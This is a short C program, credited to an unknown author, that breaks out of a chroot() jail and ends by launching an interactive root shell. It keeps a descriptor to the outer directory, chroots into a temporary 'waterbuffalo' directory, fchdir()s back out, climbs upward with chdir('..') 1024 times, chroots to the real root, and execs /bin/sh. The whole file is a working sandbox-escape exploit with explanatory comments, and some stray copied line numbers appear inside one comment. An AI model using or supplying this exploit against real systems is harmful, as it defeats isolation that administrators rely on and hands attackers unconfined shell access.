/*
 * Unknown author
 */

 #include <stdio.h>  
 #include <errno.h>  
 #include <fcntl.h>  
 #include <string.h>  
 #include <unistd.h>  
 #include <sys/stat.h>  
 #include <sys/types.h>  
    
 #define TEMP_DIR "waterbuffalo"  
    
 /* Break out of a chroot() environment in C */  
    
 int main() {  
   int x;            /* Used to move up a directory tree */  
   int done=0;       /* Are we done yet ? */  
   int dir_fd;       /* File descriptor to directory */  
   struct stat sbuf; /* The stat() buffer */  
    
 /*  
 ** First we create the temporary directory if it doesn't exist  
 */  
   if (stat(TEMP_DIR,&sbuf)<0) {  
     if (errno==ENOENT) {  
       if (mkdir(TEMP_DIR,0755)<0) {  
         fprintf(stderr,"Failed to create %s - %s\n", TEMP_DIR,  
                 strerror(errno));  
         exit(1);  
       }  
     } else {  
       fprintf(stderr,"Failed to stat %s - %s\n", TEMP_DIR,  
               strerror(errno));  
       exit(1);  
     }  
   } else if (!S_ISDIR(sbuf.st_mode)) {  
     fprintf(stderr,"Error - %s is not a directory!\n",TEMP_DIR);  
     exit(1);  
   }  
    
 /*  
 ** Now we open the current working directory  
 */  
   if ((dir_fd=open(".",O_RDONLY))<0) {  
     fprintf(stderr,"Failed to open \".\" for reading - %s\n",  strerror(errno));  
     exit(1);  
   }  
    
 /*  
 ** Next we chroot() to the temporary directory  
 */  
   if (chroot(TEMP_DIR)<0) {  
     fprintf(stderr,"Failed to chroot to %s - %s\n",TEMP_DIR,  
             strerror(errno));  
     exit(1);  
   }  
    
 /*  
 ** Partially break out of the chroot by doing an fchdir()  
 **  
 ** This only partially breaks out of the chroot() since whilst  
 ** our current working directory is outside of the chroot() jail,  
 ** our root directory is still within it. Thus anything which refers  
 ** to "/" will refer to files under the chroot() point.  
 **  
 */  
   if (fchdir(dir_fd)<0) {  
     fprintf(stderr,"Failed to fchdir - %s\n",  
             strerror(errno));  
     exit(1);  
   }

close(dir_fd);   
       
   /*   
74   ** Completely break out of the chroot by recursing up the directory   
75   ** tree and doing a chroot to the current working directory (which will   
76   ** be the real "/" at that point). We just do a chdir("..") lots of   
77   ** times (1024 times for luck :). If we hit the real root directory before   
78   ** we have finished the loop below it doesn't matter as .. in the root   
79   ** directory is the same as . in the root.   
80   **   
81   ** We do the final break out by doing a chroot(".") which sets the root   
82   ** directory to the current working directory - at this point the real   
83   ** root directory.   
84   */   
     for(x=0;x<1024;x++) {   
       chdir("..");   
     }   
     chroot(".");   
       
   /*   
   ** We're finally out - so exec a shell in interactive mode   
   */   
     if (execl("/bin/sh","-i",NULL)<0) {   
       fprintf(stderr,"Failed to exec - %s\n",strerror(errno));   
       exit(1);   
     }   
   }   

